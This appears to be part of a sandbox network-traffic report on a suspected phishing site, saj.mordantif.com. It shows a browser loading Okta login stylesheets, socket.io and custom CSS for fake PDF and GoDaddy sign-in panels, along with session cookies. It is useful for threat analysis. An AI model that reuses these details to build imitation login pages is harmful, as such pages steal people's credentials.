                                                        2024-09-13 13:07:05 UTC16384INData Raw: 74 74 6f 6e 2d 62 61 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 6e 6f 2d 62 6f 72 64 65 72 2b 2e 62 75 74 74 6f 6e 2d 62 61 72 2d 73 6d 61 6c 6c 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 6e 6f 2d 62 6f 72 64 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 64 69 76 69
                                                        Data Ascii: tton-bar,#okta-sign-in .infobox-no-border+.button-bar-small{border-top:1px solid #dadada}#okta-sign-in .infobox-no-border{border:none!important}#okta-sign-in .infobox-text{padding:0}#okta-sign-in .infobox-header{font-weight:700}#okta-sign-in .infobox-divi
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 6c 6c 65 6e 67 65 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2e 65 6e 72 6f 6c 6c 2d 73 6d 73 2d 70 68 6f 6e 65 7b 77 69 64 74 68 3a 31 35 30 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 30 30 70 78 29 7b 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 72 65 63 6f 76 65 72 79 2d 63 68 61 6c 6c 65 6e 67 65 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2e 65 6e 72 6f 6c 6c 2d 73 6d 73 2d 70 68 6f 6e 65 7b 77 69 64 74 68 3a 31 30 30 25 7d 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 72 65 63 6f 76 65 72 79 2d 63 68 61 6c 6c 65 6e 67 65 20 2e 6f 2d 66 6f 72 6d 2d 62 75 74 74 6f 6e 2d 62 61 72 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 23 6f 6b 74 61 2d 73
                                                        Data Ascii: llenge .o-form-fieldset.enroll-sms-phone{width:150px}}@media only screen and (max-width:400px){#okta-sign-in .recovery-challenge .o-form-fieldset.enroll-sms-phone{width:100%}}#okta-sign-in .recovery-challenge .o-form-button-bar{padding-bottom:15px}#okta-s
                                                        2024-09-13 13:07:05 UTC3592INData Raw: 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 61 64 6d 69 6e 2d 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 74 69 74 6c 65 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 61 64 6d 69 6e 2d 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 74 69 74 6c 65 20 73 70 61 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e
                                                        Data Ascii: ding-bottom:15px}#okta-sign-in .admin-consent-required .consent-title{word-wrap:break-word;align-items:center;display:flex;justify-content:center;text-align:center}#okta-sign-in .admin-consent-required .consent-title span{padding-left:10px}#okta-sign-in .
                                                        2024-09-13 13:07:05 UTC12792INData Raw: 74 20 2e 63 6f 6e 73 65 6e 74 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 70 7b 63 6f 6c 6f 72 3a 23 36 65 36 65 37 38 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 7b 63 6f
                                                        Data Ascii: t .consent-description p{color:#6e6e78}#okta-sign-in .consent-required .consent-footer,#okta-sign-in .granular-consent .consent-footer{text-align:center}#okta-sign-in .consent-required .consent-footer a,#okta-sign-in .granular-consent .consent-footer a{co


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.54977613.33.187.1204433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC609OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:05 UTC769INHTTP/1.1 200 OK
                                                        Content-Type: text/css
                                                        Content-Length: 10498
                                                        Connection: close
                                                        Date: Mon, 26 Aug 2024 16:07:08 GMT
                                                        Server: nginx
                                                        Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                        ETag: "e0d37a504604ef874bad26435d62011f"
                                                        x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                        Expires: Tue, 26 Aug 2025 16:07:08 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 c8faaa7d637dd73af72e1355a476ffc2.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA60-P9
                                                        X-Amz-Cf-Id: EA3CInCTXUPW3y45brYzNeS8aEYanvJKNbxhqAOomB6muAPD3VuXQw==
                                                        Age: 1544397
                                                        2024-09-13 13:07:05 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                        Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.54977218.245.31.784433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC624OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:05 UTC703INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 45806
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Fri, 05 Jan 2024 09:12:45 GMT
                                                        ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 1e0f88a39289286be3e03ff93487da80.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: Il49c4HFEcdDRs2zyARb-lZ3pnZo7qAAP9zAcPYeslCCpqQHcWba0A==
                                                        Age: 21904925
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                        Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                        2024-09-13 13:07:05 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                        Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.549777172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1369OUTGET /34PjDiabG2bEMu6719 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC634INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: text/css;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="34PjDiabG2bEMu6719"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Xq18oeli1YOicQAQVNMD%2B%2Fbg5izqLMD8isEU%2FJHcdnsUfKnmNXsIiaFxvy1ZOp1lE9Px7U8XR3QNM3ON17q%2B%2BXNtPRmqnzzoZmFIEMwFbdmOeNCtWHvszINZOVI1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb7bcef19c7-EWR
                                                        2024-09-13 13:07:06 UTC735INData Raw: 33 37 61 30 0d 0a 23 61 75 74 68 63 61 6c 6c 64 65 73 63 2c 23 73 65 63 74 69 6f 6e 73 2c 2e 74 65 78 74 2d 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 7d 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23
                                                        Data Ascii: 37a0#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79
                                                        Data Ascii: soft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 65 3b 74 6f 70 3a 33 70 78 3b 6c 65 66 74 3a 33 37 70 78 3b 77 69 64 74 68 3a 36 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79
                                                        Data Ascii: e;top:3px;left:37px;width:6px;height:18px;border-radius:20%;background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 65 72 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 31 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 62 67 5f 67 72 61 64 69 61 6e 69 6e 66 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64
                                                        Data Ascii: er;z-index:100001}#sections_pdf .bg_gradianinfo{background:rgba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;wid
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 64 65 6e 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 69 64 65 62 6f 78 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70
                                                        Data Ascii: den;line-height:1.5}#sections_pdf .login .sidebox{align-items:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-p
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 3a 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6c 61 79 66 61 69 72 20 44 69 73 70 6c 61 79 27 2c 73 65 72 69 66 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                                                        Data Ascii: :#fff;font-family:'Playfair Display',serif}#sections_pdf .login .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:c
